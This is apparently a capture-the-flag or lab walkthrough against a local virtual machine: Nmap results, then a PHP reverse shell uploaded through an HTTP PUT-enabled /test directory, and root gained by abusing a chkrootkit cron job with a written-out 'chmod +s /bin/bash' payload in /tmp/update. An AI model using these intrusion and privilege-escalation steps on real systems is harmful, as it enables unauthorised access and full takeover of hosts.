Nmap
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 5.9p1 Debian 5ubuntu1.8 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 1024 66:8c:c0:f2:85:7c:6c:c0:f6:ab:7d:48:04:81:c2:d4 (DSA)
| 2048 ba:86:f5:ee:cc:83:df:a6:3f:fd:c1:34:bb:7e:62:ab (RSA)
|_ 256 a1:6c:fa:18:da:57:1d:33:2c:52:e4:ec:97:e2:9e:af (ECDSA)
80/tcp open http lighttpd 1.4.28
| http-methods:
|_ Supported Methods: GET HEAD POST OPTIONS
|_http-server-header: lighttpd/1.4.28
|_http-title: Site doesn’t have a title (text/html).
MAC Address: 08:00:27:A3:0E:F4 (Oracle VirtualBox virtual NIC)
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: general purpose
Running: Linux 3.X|4.X
OS CPE: cpe:/o:linux:linux_kernel:3 cpe:/o:linux:linux_kernel:4
OS details: Linux 3.10–4.11, Linux 3.16–4.6, Linux 3.2–4.9, Linux 4.4
Uptime guess: 0.016 days (since Wed Oct 2 17:53:41 2019)
Network Distance: 1 hop
TCP Sequence Prediction: Difficulty=258 (Good luck!)
IP ID Sequence Generation: All zeros
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernelTRACEROUTE
HOP RTT ADDRESS
1 0.22 ms 10.0.0.17
Here we just got http port and ssh port to be opened , while enumerating i didn’t find any useful information at http
Then i used dirsearch and found /test directory which was a listing directory where put method was allowed so i just used burp suit and with the help of intercept i put a php reverse shell file , with listening port to be 443 as it doesn’t allow any other port to connect with after moving in the shell
I looked for common vulnerability for privilege escalation and found chkrootkit at cron job which makes privilege escalation very easy for us , when chkrootkit runs it looks for a file at /tmp/update and now chkrootkit is running with root as per cron job we can misuse it by giving malicious command
I just give a command at /tmp directory { echo “chmod +s /bin/bash” > /tmp/update }
www-data@ubuntu:/tmp$ ls -la /bin/bash
-rwsr-sr-x 1 root root 920788 Mar 28 2013 /bin/bashAnd got suid at /bin/bash
www-data@ubuntu:/tmp$ /bin/bash -p
bash-4.2# id
uid=33(www-data) gid=33(www-data) euid=0(root) egid=0(root) groups=0(root),33(www-data)
